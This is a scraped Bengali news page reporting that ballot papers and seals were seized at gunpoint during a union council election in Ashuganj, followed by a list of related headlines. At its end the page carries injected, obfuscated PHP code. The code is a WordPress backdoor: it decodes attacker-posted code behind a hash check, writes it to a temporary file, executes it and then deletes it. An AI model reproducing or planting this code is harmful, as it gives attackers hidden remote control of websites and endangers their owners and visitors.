বুধবার, ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

অাশুগঞ্জে অস্ত্রের মুখে ব্যালট ও সিল লুট

Brahmanbaria_Balott-Lotted-BG20160604112321ব্রাহ্মণবাড়িয়ার আশুগঞ্জ সদর ইউনিয়ন পরিষদ নির্বাচনে ভোটগ্রহণ চলাকালে একটি কেন্দ্রের প্রিজাইডিং অফিসারকে অস্ত্রের মুখে জিম্মি করে চেয়ারম্যান পদের ব্যালট পেপার ছিনতাই করে নিয়ে গেছে আওয়ামী লীগ প্রার্থী মো. সালাহ্ উদ্দিনের সমর্থকরা। শনিবার সকাল সোয়া ১০টার দিকে উপজেলার নাঁওঘাট সরকারি প্রাথমিক বিদ্যালয় ভোটকেন্দ্রে এ ঘটনা ঘটে।কেন্দ্রের প্রিজাইডিং অফিসার মো. কবির হোসেন জানান, সকাল সোয়া ১০টার দিকে নৌকা প্রতীকের ব্যাজ পরা শতাধিক যুবক ভোটকেন্দ্রে জোরপূর্বক প্রবেশ করে। এসময় ২০/২৫ জন যুবক আমার কক্ষে প্রবেশ করে আমাকে অস্ত্রের মুখে জিম্মি করে ৬শ` ব্যালট পেপার ছিনিয়ে নিয়ে যায়।
এছাড়া ওই কেন্দ্রের দুইটি বুথ থেকে একটি করে ব্যালট পেপারের বই ও সিল ছিনিয়ে নিয়ে যায় নৌকার সমর্থকরা।এদিকে কেন্দ্রে উপস্থিত পুলিশ সদস্যদের উপস্থিতিতেই ব্যালট পেপার ছিনতাই হয়েছে বলে অভিযোগ করেছেন কেন্দ্রে অপেক্ষমান ভোটাররা।তবে কেন্দ্রের দায়িত্বপ্রাপ্ত কর্মকর্তা ও সরাইল থানা পুলিশের ভারপ্রাপ্ত কর্মকর্তা (ওসি) রূপক কুমার সাহা অভিযোগ অস্বীকার করে বলেন, শান্তিপূর্ণভাবেই ভোটগ্রহণ চলছে, ব্যালট ছিনতাইয়ের কোনো অভিযোগ আমাদের কাছে আসেনি।

এ জাতীয় আরও খবর

মুক্তিযোদ্ধার ভুয়া সনদ : ভাতা সুদে-আসলে ফেরত নেবে সরকার

তানজিমকে শাস্তি দিয়েছে আইসিসি

সুনামগঞ্জে বন্যা পরিস্থিতির আরও অবনতির শঙ্কা

পিয়ংইয়ং পৌঁছেছেন রুশ প্রেসিডেন্ট পুতিন

নতুন সময়সূচি চালু : আজ থেকে ব‌্যাংক লেনদেন ১০-৪টা, অফিস চলবে ৬টা পর্যন্ত

তীব্র তাপপ্রবাহের মধ্যে এ বছর ৫৫০ হজযাত্রীর মৃত্যু

ব্রাহ্মণবাড়িয়ায় তিনহাজার টাকা পাওনা নিয়ে হাতাহাতি, বৃদ্ধের মৃত্যু

বছরের সবচেয়ে দামি নায়িকা দীপিকা

বুবলির নাম মুখে নিতে ‘ঘেন্না’ লাগে অপুর

তুফান সিনেমা দেখতে গিয়ে হল ভাঙচুর করলো দর্শকেরা

পতন ঘটতে পারে সরকারের, মোদির জোটের লোকজন যোগাযোগ করছেন : রাহুল

জীবিকার তাগিদ ঘরে ফিরতে দেয়নি তাদের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}